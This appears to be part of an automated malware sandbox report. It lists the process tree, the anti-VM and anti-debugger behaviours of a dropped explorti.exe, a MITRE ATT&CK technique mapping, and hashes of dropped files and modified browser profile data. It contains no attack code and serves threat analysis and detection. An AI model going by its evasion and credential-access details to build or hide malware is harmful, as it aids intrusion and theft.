    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5088.4.890521485\2057062834" -childID 3 -isForBrowser -prefsHandle 3940 -prefMapHandle 3936 -prefsLen 27325 -prefMapSize 234060 -jsInitHandle 1268 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d2026a6-9f79-45a8-adfe-4f8a1c83d2ef} 5088 "\\.\pipe\gecko-crash-server-pipe.5088" 3948 261c2f05f58 tab
    3⤵
    PID:1432
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5088.5.835016460\1349720145" -childID 4 -isForBrowser -prefsHandle 4364 -prefMapHandle 3560 -prefsLen 27325 -prefMapSize 234060 -jsInitHandle 1268 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8ba9f762-b144-4f1a-b40c-c150dfcbbba9} 5088 "\\.\pipe\gecko-crash-server-pipe.5088" 4348 261c3660c58 tab
    3⤵
    PID:5056
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5088.6.1446001563\1587943656" -childID 5 -isForBrowser -prefsHandle 5080 -prefMapHandle 5076 -prefsLen 27325 -prefMapSize 234060 -jsInitHandle 1268 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e035d819-834c-4384-ae81-171d99ec273b} 5088 "\\.\pipe\gecko-crash-server-pipe.5088" 5092 261c3aaeb58 tab
    3⤵
    PID:4004
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5088.7.945187202\1994747018" -childID 6 -isForBrowser -prefsHandle 5224 -prefMapHandle 5228 -prefsLen 27325 -prefMapSize 234060 -jsInitHandle 1268 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc60373f-ecf0-4aab-a17a-0e4d87c0be0e} 5088 "\\.\pipe\gecko-crash-server-pipe.5088" 5220 261c47f1858 tab
    3⤵
    PID:4776
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5088.8.1716444802\917790769" -childID 7 -isForBrowser -prefsHandle 5416 -prefMapHandle 5420 -prefsLen 27325 -prefMapSize 234060 -jsInitHandle 1268 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {20664c2a-b3b1-4c1a-90a3-5d362f6fac30} 5088 "\\.\pipe\gecko-crash-server-pipe.5088" 5500 261c47f1b58 tab
    3⤵
    PID:1336
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5088.9.1316182201\103922171" -childID 8 -isForBrowser -prefsHandle 5488 -prefMapHandle 4108 -prefsLen 27325 -prefMapSize 234060 -jsInitHandle 1268 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2b02629c-e6d3-41dc-80b1-1228b07c8e1b} 5088 "\\.\pipe\gecko-crash-server-pipe.5088" 5312 261c42b6a58 tab
    3⤵
    PID:5744
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5088.10.1316062097\1154494633" -childID 9 -isForBrowser -prefsHandle 5948 -prefMapHandle 5944 -prefsLen 27325 -prefMapSize 234060 -jsInitHandle 1268 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {066a902b-e11d-44ad-93f3-e7554f68fbba} 5088 "\\.\pipe\gecko-crash-server-pipe.5088" 5956 261c4ed6858 tab
    3⤵
    PID:4540

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2496

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5528

C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
C:\Users\Admin\AppData\Local\Temp\ad40971b6b\explorti.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

Filesize
2.0MB

MD5
1f95eb9cf8db2e59d5a497d494a7f938

SHA1
db68dea0851cadb267cd9abf182bc142aef87d30

SHA256
1e50aca033f27a7e8de90b667560a79928107a85355f1c070f768809e1cab0cd

SHA512
122f1793c9a9cd367f90fa914ead34a4584eeca49989df1f2d996dbd6b244cefc8f2e07a3d4b92ace239d5ad2bdba075dd7c42577873dea7b755565406604fc2

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
2.0MB

MD5
26dcc4d75573adae914003c466f286c5

SHA1
c5c25a400ba013e4b0637f52296e28a658930a52

SHA256
afeaa79dc732c324cd8bca8fac0325872edbaa6510c6073beb32fd73af5002bf

SHA512
3c734f9a6acbb7c49ebbcc2648c351f27bfadf3dbcb8143d419586f47e7f509edec0f3eb5e7927997d391fe7196daa8ac82930585499d0fba80e298d896a4d47

Download Submit
C:\ProgramData\AAKKKEBFCGDB\BKKKFC

Filesize
92KB

MD5
3daad470df391b2f80f1355a73f49b47

SHA1
fd3d71f1d5bcca2c56518cdb061fc1e0a2465dec

SHA256
a0732dc29331aee2809c08b9dd1bbddcfd6badc2b90a932b1e5c220d573e7b08

SHA512
a03c5c17710c1ecafebca8b3066db41e1d682a619162da61d12f7f84c8ead35b49b6f390a473e23c41baff6072ffc6000a52345d5a1f73371b8711f470216b6a

Download Submit
C:\ProgramData\AAKKKEBFCGDB\GDBAKK

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\ProgramData\AAKKKEBFCGDB\GHJJDG

Filesize
6KB

MD5
b26bad02e352bbb912c7c113333388fc

SHA1
e70be0da0eb8cf03d70c5c1ebb6d050c28ba4963

SHA256
0a495015f84e0876ef9da91f096ed0f85ffc1d3b59aa4483a110558b5006a35e

SHA512
1992fe7caf555289d689c19155f234370f61deda501dc5ad97703b092a01e178e7a015534398968f561da65f6ce422745d8d8a1c0907b6d9ad40a29a013a1074

Download Submit
C:\ProgramData\AAKKKEBFCGDB\GHJKEH

Filesize
96KB

MD5
d367ddfda80fdcf578726bc3b0bc3e3c

SHA1
23fcd5e4e0e5e296bee7e5224a8404ecd92cf671

SHA256
0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0

SHA512
40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

Download Submit
C:\ProgramData\BAEHIEBGHDAF\CAKKJK

Filesize
20KB

MD5
c9ff7748d8fcef4cf84a5501e996a641

SHA1
02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

SHA256
4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

SHA512
d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\ProgramData\BAEHIEBGHDAF\KECGDB

Filesize
148KB

MD5
90a1d4b55edf36fa8b4cc6974ed7d4c4

SHA1
aba1b8d0e05421e7df5982899f626211c3c4b5c1

SHA256
7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c

SHA512
ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

Download Submit
C:\ProgramData\freebl3.dll

Filesize
669KB

MD5
550686c0ee48c386dfcb40199bd076ac

SHA1
ee5134da4d3efcb466081fb6197be5e12a5b22ab

SHA256
edd043f2005dbd5902fc421eabb9472a7266950c5cbaca34e2d590b17d12f5fa

SHA512
0b7f47af883b99f9fbdc08020446b58f2f3fa55292fd9bc78fc967dd35bdd8bd549802722de37668cc89ede61b20359190efbfdf026ae2bdc854f4740a54649e

Download Submit
C:\ProgramData\msvcp140.dll

Filesize
439KB

MD5
5ff1fca37c466d6723ec67be93b51442

SHA1
34cc4e158092083b13d67d6d2bc9e57b798a303b

SHA256
5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062

SHA512
4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

Download Submit
C:\ProgramData\softokn3.dll

Filesize
251KB

MD5
4e52d739c324db8225bd9ab2695f262f

SHA1
71c3da43dc5a0d2a1941e874a6d015a071783889

SHA256
74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a

SHA512
2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

Download Submit
C:\ProgramData\vcruntime140.dll

Filesize
78KB

MD5
a37ee36b536409056a86f50e67777dd7

SHA1
1cafa159292aa736fc595fc04e16325b27cd6750

SHA256
8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825

SHA512
3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619

Filesize
471B

MD5
3a0138bae64e9d60c25031699bdf3538

SHA1
064b6da66e705629e7a96d3446b6b75d340abd3c

SHA256
9e79c64d8ec3fa6f1851203b8e12803ba6149966b697c15eff73b1ff95c573fa

SHA512
b63091a1869cf7816e8c77fd71b4d98e2d06c5a167483d2a1ecaf0dd0a0bb086ed6ca8daa9dac3783f4d19c5cee65dd7681f8a7bf0bc8d157433f84f959cc2e7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E93892934B_C31B2498754E340573F1336DE607D619

Filesize
400B

MD5
e55eeb2df9d58732760edf34fbd345ca

SHA1
6f0237a6376189294d74dc4822850b887c2a3c5e

SHA256
f8cef3e7442accf8405ae6bf1fe05fc82fe9bebbae4dc3ebe1040c5271746757

SHA512
5b008631438705f67da7bec7f8afcdf02cd448950c10bed8f746998460bbf9e19dd267871694d12f9ee6c44b6edb4d4767ea49107183f0ea0dad8418aa6a945d

Download Submit
C:\Users\Admin\AppData\Local\Golden Musical Variety\goldenmusicalvariety32_64.exe

Filesize
4.0MB

MD5
ed4e3f5bce2260b098a8b9d7506df1d2

SHA1
51703305e66eb4c28b407fe981fa736838f93cb0

SHA256
21365b249fa4835f6e8ddf075cb0e0b18d76124d057b4336f50d43822c2be1c6

SHA512
8b63b2cce6488baf149ddf4544465473b67dd8f004914fb878a3d725ec5dae87a2a9fcbe4fdf33568fcce135a232b2ac71a771c3d14ff88ea8f51bdd7be80564

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\es\messages.json

Filesize
151B

MD5
bd6b60b18aee6aaeb83b35c68fb48d88

SHA1
9b977a5fbf606d1104894e025e51ac28b56137c3

SHA256
b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

SHA512
3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
61dbdfb664b1c904829dbd11000631a3

SHA1
0516858704d9b4796a07784bab223ef7196f0bbe

SHA256
ea1af6f19eee4b161a61507f643ee766701734b478dcef0d76ea940ffbfb0cb1

SHA512
05672e60e915b5048d958aaf4d56ee67b028d669afc239e853a1d2d47bbd384a02720a8c52132909c40f5ba55728d2f2cb98372478f64f5daf9195215c53acc0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
4e78941a20fe6e13afc6d314cf0ff011

SHA1
154639097c49795dd610230499b20345263f181a

SHA256
66765d459f8057009487f44ca4c6f21e1564231375f889658f7e9ea0e11f28a3

SHA512
539b1630c86372091c2645a3b072ec4357a8e647c65919a016f29773ad720bb72b82a97af763f2419afaa85188e4b0f0faacf22a3e121ff6374bba7ad09424bf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
30KB

MD5
4057d118ba53b1c507e2f5d226c28c58

SHA1
aed4270d6ca4ec4c00f4793b0fa465a5665c933a

SHA256
5ed2831ba5a7fe2fdf920a3b9bd2033ec57119686abdfa405872b59f8dc05374

SHA512
2bcfca17f164ff482563e0dd467d46283028da29247d1b08000df6a75099a4ac2bde5139bddc1be7b4c1c16b73cf4e5104bd8f69df4c0d4755680f6189679e3a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
35KB

MD5
a28b1393c9b705b5ecdab89c2efb61f6

SHA1
9c9436fd6e30b1e2f6b57ad10a07d392b87865a7

SHA256
0f17b088e176ebfe200fdc5ec2dd12be98ce9208c0735a1b562947ceb56a56f8

SHA512
575b6fb67d841696b3e1baa5904c74911a980bd89d942f7ca2b3cc67552d5e5c72b9e3da22d6773af70eba593de61034f8444aea4de7c121020ad39989dadf89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

Filesize
2KB

MD5
90f2958528f036abcae48d93ede6f8ce

SHA1
e5a6935d1c874d66766b83882e49db9d84be3b8a

SHA256
4a32fff3e568bf2d9ae0f88279de7009f7949d4030a3a0005e56171268b9f74b

SHA512
0c89f2b88e89c9b77a0e4d034513b82c70fa5c57ec976eb418202472eb5ab582e184abfe696927526da0dc687c14e24c9cee1d39432e5f7b4a67b60e0ad25b91

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
9cfc7a98b758174d91a40515a37ef935

SHA1
ccd0eff396f99a725c697990544c345256a36215

SHA256
8385a9299312f77a2ced3780086eeeb82f9aa7ab0080d6a26235e09f066ec26e

SHA512
0a11eb0d96f5669c2e2bed54bbca25395b9d1749384e452fd2e97ca4457d8d04f58d764839fcba56eb5e081844d11f455a9d1342a086c21318300ebe93987001

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
2f89480edb0a3d9c67675f4dd0a1886f

SHA1
54be620baf1ab9940a33d91da0126b7bd35add46

SHA256
fdb97b26c4878f680976dc603e27a65e82fafeb5f3e0dd16d13bbd6315376057

SHA512
e2a0d0f6588d07d45ffaeb4c7d7c4a59c89f89180a4e6201ee0d7a5446f3f18719a73650a45dce18bb0e96ec07ef051cbc5f84b17475c6a340361ffe823d6b70

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\thumbnails\dbb303e8878093beb83e43755b8acbad.png

Filesize
2KB

MD5
7da2f8e3c3de0fff0f0195741ab0e6be

SHA1
bc1cbafc2dded6a8f41534160ca27bdc661c7bf3

SHA256
4f99ad4809aef29959a06a532ccbf4206244896020e507a779e56f8d67fd80c6

SHA512
f18ff17cc1f5b66a1072816dba92909b76f5226610a8fdea56c162bfb01becba6decedd1828dcc22f4c4d918e1abc0e1f7b3d21e20d030d20dd40a78fa37cc26

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000011001\b5ed612d79.exe

Filesize
1.2MB

MD5
009cdfab16e724819991bead9e4aa018

SHA1
d1a4f67a3b3c85005aeafdf3e70d3cbde9a77229

SHA256
381a47a3c3d0526c6fc61879594157822525bbc66e47c8a5c094e75c70cb624d

SHA512
25db1fc6c22f76c0cabe0f2ab7026368d798424601d14295223b2e25981e2d64706ef442fa5facd693e573e7bd4f3d41073fd1b1cd0ee4cc6fb110ac2f13a1ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSBD1C.tmp\Install.exe

Filesize
6.4MB

MD5
a49521b2e894fbc7c60c080cfad23266

SHA1
9fe2546cec1beda8a263d2eb4db165f935f72678

SHA256
a29e87e02616d76a5230d3cabef5c6f1c87fb5880cfd779290576c62da599c7e

SHA512
46e2e7013e0dd6c0105365f1086006b7deef7f7983dccc0cf582f80b30003343123b9804398d2c5541b7db9e15600f6d4733a10c7e2c30673986edf5316fdcb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSBD5B.tmp\Install.exe

Filesize
6.4MB

MD5
374eb357ca7375d0d8f0eafc20c5ee46

SHA1
6cec160f57536d8c25bc9b2dd71b5dfe3a3b21b6

SHA256
9f76b5e1915e4647a5fe11e4eec7abd0cd200d90c4fe8e8e1b57a0880f00447d

SHA512
cc7e38fe44dcbae319147f3761db26c244cc6456debe4d5e48e2c2635948711118ab94680fb8e932f89fef3be3b31a3dc3066c637c2f1333c962cfe34f888969

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSC77C.tmp\Install.exe

Filesize
6.7MB

MD5
24b636b0fecb12cb06541f0b4549b590

SHA1
389301f3c648e8fa91c9ba9103875ede3d7de419

SHA256
1bc60b91092f349b720b2f70ecb7df08b5faeae43b36323677fc8fe73e1407f0

SHA512
d4e34dc5831e8eca8db1f23a120a116b7d7b015d3ab1944e1da57253f4513540882a8d701ad0f0f95ea4078790deebff7d82afdb327d053979cc8c999b1a56c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSCC8D.tmp\Install.exe

Filesize
6.7MB

MD5
e3fbf351ef5be877ef197fac43b7ef47

SHA1
fa6fb09c45a31ac7d57d7bc99d5e87af07c9e867

SHA256
a3a22fd958ee1abe33535eb3ce53e1fa35f3becf12401d643fa4f9bdce36ad7d

SHA512
319cb4a53574980a1a7b3f1f316fcceb38ef6a60b7da023b1d06ee509ef06a6ed76a2f8e68e2fe25a2219f3eaa4c7f5ab845a7f3096916cdd1147a2b230bb59e

Download Submit
C:\Users\Admin\AppData\Local\Temp\IIEHCFIDHI.exe

Filesize
1.8MB

MD5
035f7b0d89d000f8ab62fb701892a3bc

SHA1
ea17dcb05270e97e2b078a3f4b2d2b786ae49b92

SHA256
6f68d1b39d29ae82751b6fcd113f750ddd9df3ce86ed89b4463b7c264effce17

SHA512
38ab5d6079dd473c62d70fb48b7071d08e34353e22dfcb53ff9bef913f15efca60a31954cfe9160600f3aaa98fbd5e445ae7c90f22e5e3801297c35abdb3d0fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ne01nqi.uxj.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\archive.zip

Filesize
14.0MB

MD5
aa3be7accc9a612ce95fcede2a64d791

SHA1
76bab53214bef8715658e47a01e14b9efc91cea9

SHA256
d5414ed0d1cdcdd945185b89689fc3436c9e81663b35f0df890eeed3a2b6d4a4

SHA512
dc232e6a0588161bd4b5decd3311a3ad1b5e58f723fa8ae7065ee3fa538fd432f4ef8bb857a3be372da97e62c49584041b94a4219ef8eae954491e963f09ecb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-5RQBB.tmp\61aT9Z_GFEpsfKAXD3NOSsRp.tmp

Filesize
680KB

MD5
2686ea398b2614d130552b29222aa9dd

SHA1
8102e0f3ee90f049a0e9720ad31fdd66326476cc

SHA256
9bfd8edf1f9c270dd98b41b912a0950ff2e1d96bf220c4eb8d32bd3174274b63

SHA512
a815591db477114093763de0c971e71134062bc13e16a90762759336b8a9b80d35db690a7562d01c613c2295d8d3df7c9dcffea6593bf6015109c0ce0cfe0974

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon

Filesize
442KB

MD5
85430baed3398695717b0263807cf97c

SHA1
fffbee923cea216f50fce5d54219a188a5100f41

SHA256
a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

SHA512
06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

Filesize
8.0MB

MD5
a01c5ecd6108350ae23d2cddf0e77c17

SHA1
c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

SHA256
345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

SHA512
b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\broadcast-listeners.json.tmp

Filesize
204B

MD5
72c95709e1a3b27919e13d28bbe8e8a2

SHA1
00892decbee63d627057730bfc0c6a4f13099ee4

SHA256
9cf589357fceea2f37cd1a925e5d33fd517a44d22a16c357f7fb5d4d187034aa

SHA512
613ca9dd2d12afe31fb2c4a8d9337eeecfb58dabaeaaba11404b9a736a4073dfd9b473ba27c1183d3cc91d5a9233a83dce5a135a81f755d978cea9e198209182

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\crashes\store.json.mozlz4.tmp

Filesize
66B

MD5
a6338865eb252d0ef8fcf11fa9af3f0d

SHA1
cecdd4c4dcae10c2ffc8eb938121b6231de48cd3

SHA256
078648c042b9b08483ce246b7f01371072541a2e90d1beb0c8009a6118cbd965

SHA512
d950227ac83f4e8246d73f9f35c19e88ce65d0ca5f1ef8ccbb02ed6efc66b1b7e683e2ba0200279d7ca4b49831fd8c3ceb0584265b10accff2611ec1ca8c0c6c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\datareporting\glean\db\data.safe.bin

Filesize
12KB

MD5
5b40a9e65499542b0ad9cf6b55177c0b

SHA1
a5692940dcf99c6c302b343bb16deb7a476bf1b0

SHA256
71f4982b0923960cd1215697cfc6499462bbe555655db1948ef95f44db289255

SHA512
f52ad390776e1a013fe20aafc11f8928895b39d425f98e6cf24ba4f9c5cf797aabb4548a258c94118a9d16135c074bce9888ab9b7c0c29ac7a013ec818acec02

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\datareporting\glean\db\data.safe.bin

Filesize
9KB

MD5
26bd2dd905d4e3cea905005e581f59db

SHA1
6046510dedf0eb1f6f7218a9cbf011a982b4225a

SHA256
7f2139203c7c3daf4ad56740f49896e9e92f4d3d4e2cfe3deded43942d84d2c3

SHA512
a97194500b38b731369df993c5525aa61c9ea33b475fb74be22012e76c804f43d33f313d34cbae3fe6f1d764a6a20a7dc66b14695447dd98a2480d2776a1b5a3

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\datareporting\glean\pending_pings\1ca20204-b0d0-4042-8bb7-758b33932e81

Filesize
797B

MD5
89ec5604462c84ca1e45bd1f50675da2

SHA1
18009e5e6441d6179f788ab847ba4389ca5f835e

SHA256
db7ac4050a4354fc154aef047ac728fc8b5c9251d25b3051a2cc6abae5800265

SHA512
7eedaabd143bf5a6568334bba726505272f759f0a3117b755c347aa1efa64e5d24f4d62df18830d7b988082f5436f8395c405365ae414a081167701ff1093c24

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\datareporting\glean\pending_pings\61cbdc2c-8c65-4fd6-b4e1-ddfbe6c85778

Filesize
734B

MD5
45bb68338e13fbd997b43f3ef7bf80a4

SHA1
e284519494bb2847ec046a06ea51d6dbd259bbb6

SHA256
5b28f8f6cf8f29ae5990deb4b4ea7325995d26827dd52db775a3a9bee0780bbd

SHA512
faa7060d344af8167fa1ac3a71a05f474b94cdc36cf9d399f30e890d08e89252e1172b47db5c93a1d4730c1593a238a8bf4b8a5f017235763388e692b1e1964b

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\datareporting\glean\pending_pings\7dfa35be-c9d4-419a-8230-f05257d8599f

Filesize
657B

MD5
0212ea7eed1a197e4accd1f58d770a5c

SHA1
53679c515328853d5b461a15d2de0af7a05ab358

SHA256
2c1198958cba272b66c497af24b9e8d9ab3824d0e192393b80803dc12e30ef84

SHA512
9a1b0b13763b9b1f24203cb00dc6445584b1c6b6cef4020125e5a8282c138d87ac30a9803363c65f17fa4ada109e11ca280a652862b1701723388c1b7e2f66f8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\datareporting\glean\pending_pings\a9916d0e-0acf-4f60-b6af-5ed257bf0af9

Filesize
768B

MD5
8b076c3c445ad0024df66612d5212e78

SHA1
3f49c88c1470f49d0ad3ad24ee24507d376eabcc

SHA256
82096fd676b8ca9e7d3df62550f5d9e4892c22120c6c67434e1791820562c118

SHA512
